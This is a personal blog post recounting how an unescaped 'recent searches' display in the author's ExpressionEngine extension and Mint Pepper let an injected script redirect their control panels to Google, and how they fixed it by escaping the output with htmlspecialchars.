Ennovy.org

This is embarrassing. For the last few days, I have been unable to access my EE control panel. I have the control panel home page bookmarked, and whenever I tried to access the page, I’d see the page loading for less than a second, and then I’d get automatically redirected to the Google homepage.

At first I thought it was a bug or a glitch, so I cleared out my browser’s cache and restarted the browser. That didn’t work. The same thing happened when I tried accessing the control panel in Safari and Internet Explorer. With Safari I was logged in via cookies, and with Internet Explorer, I wasn’t, but that didn’t make a difference.

Then I realized that I couldn’t access my Mint control panel either, it also redirected me to Google.

My next thought was maybe someone had hacked my php files, and added in some redirecting code to it. Or to my .htaccess file. I checked those, and I didn’t find anything.

At this point I was annoyed and out of ideas, so I ignored the problem for a day or two, hoping that it would just go away. It didn’t.

Finally, and this took me a few days, I realized that even though I couldn’t access the EE control panel home page, I could access the other parts of the control panel, such as the Admin page or the My Account page. So, it must be something in the Mint control panel page and the EE control panel home page that was causing this.

It turned out to be something I had written, an extension for EE and a custom Pepper for Mint. They both do the same thing, that being displaying the recent searches made in EE. And someone had made the following search:

The search term contained a link to a javascript file, and the contents of the javascript file was just one simple line which directed anyone who loaded that javascript to Google:

Scary hmm?

When displaying the recent searches, I was simply pulling the search terms from the database and outputting them raw, without bothering to check whether or not there was any malicious code in there. So when I tried to access the page, the javascript file was loaded and I got redirected to Google.

It could have been worse than just a simple redirect too. The javascript could have contained much more nasty code.

To get my control panel home page back, I edited my php code and added an htmlspecialchars function around the search terms. It works, but there’s probably more I could do to make sure this and other similar things doesn’t happen again.

And, I found that if you do a search for this domain in google, you can see that my site isn’t the only one that this has happened to.